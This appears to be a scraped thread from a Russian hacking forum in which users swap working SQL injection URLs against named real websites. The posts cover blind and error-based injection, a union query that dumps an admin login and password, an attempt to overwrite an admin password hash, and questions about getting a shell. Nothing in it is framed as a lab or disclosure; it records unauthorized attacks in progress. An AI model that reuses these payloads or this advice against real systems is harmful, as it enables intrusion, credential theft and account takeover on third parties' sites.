Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    https://forum.antichat.ru/showpost.php?p=2582303&postcount=16413
    Выше на несколько постов Expl0ited'ом на живом примере приведен аналогичный способ проведения инъекции с выводом в ошибку Duplicate Entry, разве что только там режется пробел.
     
    #18021 h00lyshit!, 7 Oct 2011
    Last edited: 7 Oct 2011
  2. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7&ip=test8&ver=test9&msg=test10

    и эта не работает
    http://fvsn.org/skynet/log.php?event=test&os=test1&client=test2&ie=test3&fr=test4&op=test5&ch=test6&guid=test7',(SELECT%201),'a1','a2')--%20-&ip=test8&ver=test9&msg=test10

    слепая скуль, что то делаю не так (перебираю a-z)
    http://fvsn.org/download.php?id=18296%20and%20lower('a')=lower(substring((SELECT%20os%20FROM%20log),1,1))

    подскажите чего нибудь
     
  3. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    1 - просто вывод того, что передали параметром.

    2.
    http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr(version(),1,1))>0,1,0))
    меняешь >0 и подбираешь код символа. через char() можешь получить его значение.
     
    1 person likes this.
  4. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    кстати ascii не работает
    http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(lower(substr('1',1,1)))=31,1,0))
     
  5. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr(version(),1,1))='5',1,0))

    вот так фурычит
     
  6. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    только вот не понятно как с SELECT запрос сделать, там тоже чтото фильтруется
     
  7. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    532
    Reputations:
    935
    что не так?
    Code:
    http://fvsn.org/download.php?id=(18296)and(1)=if(mid((select(version())),1,1)=5,1,0)
     
    _________________________
  8. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Code:
    http://fvsn.org/download.php?id=(18296)and+1=(if(ascii(substr((select count(table_name) from information_schema.tables),1,1))=49,1,0))
    Тут тоже не фильтруется.
     
  9. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    360
    Likes Received:
    54
    Reputations:
    4
    такая ситуация:
    обычная скуль..ничего не фильтруется, трудностей не возникло вообще до получения login;pass админа. Хочу получить шелл, НО:
    1. Не могу найти панель администратора. Такое впечатление, что на самом сайте ее вообще нет.
    2. Нет прав у текущего юзверя под которым работает БД на то чтобы залить шелл средствами с ку эль.

    Есть какие еще варианты получения шелла?

    Чтобы не быть голословным привожу линк
    http://banksbattle.ru/333.php?archiv=-59+union+select+1,concat(login,0x20,password),3,4,5,6+from+admins--

    жду ваших предложений=)
     
  10. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    блин у меня сейчас голова взарвётся. как так это работает.

    ведь это не работает
    http://fvsn.org/download.php?id=(18296)and%20ascii('1')=31

    , а в ней ascii

    я сейчас сума сойду, как в первом выражении ascii прошло, а в моём не проходит, объясните пожалуйста?
     
  11. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    532
    Reputations:
    935
    потому результат работы функции ascii('1')=49, а в условии у тебя ascii('1')=31, т.е. 49=31, т.к. 49 не равно 31 возвращается false и в ответ ничего не приходит!
     
    _________________________
  12. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    блин сильно туплю. я то подставляю 31h=49=ascii('1')

    Спасибо.

    начал программулину писать которая выдернет имена столбцов. Возможно я лишную работу делаю. Может кто знает софтину какую нибудь для слепых SQL. Я тут нашёл BSQL Haker но она какая то ограниченая не подходит для данного случая
     
  13. Konqi

    Konqi Green member

    Joined:
    24 Jun 2009
    Messages:
    2,251
    Likes Received:
    1,148
    Reputations:
    886
    https://wifi.hm-ugratel.ru/?m[admin]&id=',''and(select(1)from(select(count(*)),(concat((select(id)/**/from/**/fontan.mp_gw_auth/**/limit/**/0,1),0x00,floor(rand(0)*2)))x/**/from(information_schema.tables)group/**/by(x))a)and'
     
    _________________________
  14. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    В Havij неплохго реализована работа с слепыми SQL. Описание есть на данном форуме вот в этой теме.
     
    _________________________
  15. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    удалось мне выдернуть структуру таблиц. логин и хеш пароль админа, но вот с расшифровкой проблема

    root
    cb4616f2ab30f37f6facf7e61036a5ec

    пытаюсь проапдейтить запись на пароль 123, но похоже что то не так вписываю, если эта запись вообще возможна тут.

    пароль получается так md5(md5(salt(pass))); судя по исходникам DataLive Engine.

    salt='abchefghjkmnpqrstuvwxyz0123456789';

    PHP:
    $salt "abchefghjkmnpqrstuvwxyz0123456789";              srand( ( double ) microtime() * 1000000 );                            for($i 0$i 9$i ++) {                  $new_pass .= $salt{rand033 )};              }                            $db->query"UPDATE " USERPREFIX "_users set password='" md5md5$new_pass ) ) . "', allowed_ip = '' WHERE user_id='$douser'" );              $db->query"DELETE FROM " USERPREFIX "_lostdb WHERE lostname='$douser'" );
    http://fvsn.org/download.php?id=(18296)and+1=(if(lower(substr((UPDATE%20dle_users%20set%20password='d9b1d7db4cd6e70935368a1efb10e377',allowed_ip=''),1,1))='5',1,0))
     
  16. Melfis

    Melfis Elder - Старейшина

    Joined:
    25 Apr 2011
    Messages:
    505
    Likes Received:
    105
    Reputations:
    53
    Mr.aids,
    1. нельзя делать апдейт в подзапросе.
    2. md5(md5(salt(pass))) - не так, а md5(md5($pass . $salt)), где $salt = 9 random symbols from 'abchefghjkmnpqrstuvwxyz0123456789'.
    3. Хз как в дле, но судя по коду, там должна быть отдельная колонка с солью в базе.
     
    1 person likes this.
  17. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    да я туплю опять жестоко. код который я привёл с md5 md5 salt это генерация нового пароля. а проверка и регистрация обычным способом идёт

    PHP:
        $user $db->safesqltrim$user_arr[0] ) );      $email $db->safesqltrim$user_arr[1] ) );      $pass md5$user_arr[2] );        if( md5sha1$user $email DBHOST DBNAME $config['key'] ) ) != $user_arr[3] ) die( 'ID not valid!' );        if( preg_match"/[\||\'|\<|\>|\[|\]|\"|\!|\?|\$|\@|\/|\\\|\&\~\*\{\+]/"$user ) ) die( 'USER not valid!' );        $row $db->super_query"SELECT * FROM " USERPREFIX "_users WHERE name = '$user' AND password='$pass'" );  
    md5 без соли. А можно как то сделать запрос что бы сделать апдейт?
     
  18. Mr.aids

    Mr.aids New Member

    Joined:
    19 Feb 2011
    Messages:
    10
    Likes Received:
    0
    Reputations:
    0
    и не могу понять что с таблицей columns, судя по информации из tables таблица есть. Но все запросы терпят неудачу

    http://fvsn.org/download.php?id=(18296)and%201=(if(ascii(substr((select%20column_name%20from%20information_schema.columns%20limit%206,1),2,1))=86,1,0))

    перебираю все символы нет реакции
     
  19. Expl0ited

    Expl0ited Members of Antichat

    Joined:
    16 Jul 2010
    Messages:
    1,036
    Likes Received:
    532
    Reputations:
    935
    С чего ты взял что второй символ запроса select column_name from information_schema.columns limit 6,1 равен букве V?
    Настоятельно рекомендую тебе прочесть статью: http://forum.antichat.ru/thread43966.html
    И если в следующий раз думай прежде чем задать вопрос, иначе сообщение будет ликвидироваться.
     
    _________________________
  20. BigBear

    BigBear Escrow Service
    Staff Member Гарант - Escrow Service

    Joined:
    4 Dec 2008
    Messages:
    1,788
    Likes Received:
    872
    Reputations:
    859
    Для начала проверил бы, а есть ли вообще данные в этой таблице ??

    Code:
    
    http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+cup.user),1,1))=49  FALSE
    
    http://www.teamarena.ru/demo/-9999999+or+ascii(substring((SELECT+count(*)+FROM+cup.user),1,1))=48   TRUE
    
    В таблице cup.user 0 записей как видно.
     
    _________________________
Loading...
Thread Status:
Not open for further replies.